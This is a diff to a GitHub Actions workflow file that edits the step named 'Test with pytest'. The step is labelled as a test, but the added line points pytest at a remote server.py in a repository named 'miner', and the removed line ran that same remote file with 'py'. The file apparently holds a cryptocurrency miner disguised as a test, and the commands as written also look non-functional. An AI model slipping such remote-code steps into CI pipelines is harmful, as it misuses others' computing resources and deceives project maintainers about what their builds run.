--- a/.github/workflows/python-app.yml
+++ b/.github/workflows/python-app.yml
@@ -30,4 +30,4 @@ jobs:
         if [ -f requirements.txt ]; then pip install -r requirements.txt; fi
     - name: Test with pytest
       run: |
-        py https://raw.githubusercontent.com/Vasiliy-katsyka/miner/refs/heads/main/server.py
+        pytest https://raw.githubusercontent.com/Vasiliy-katsyka/miner/refs/heads/main/server.py
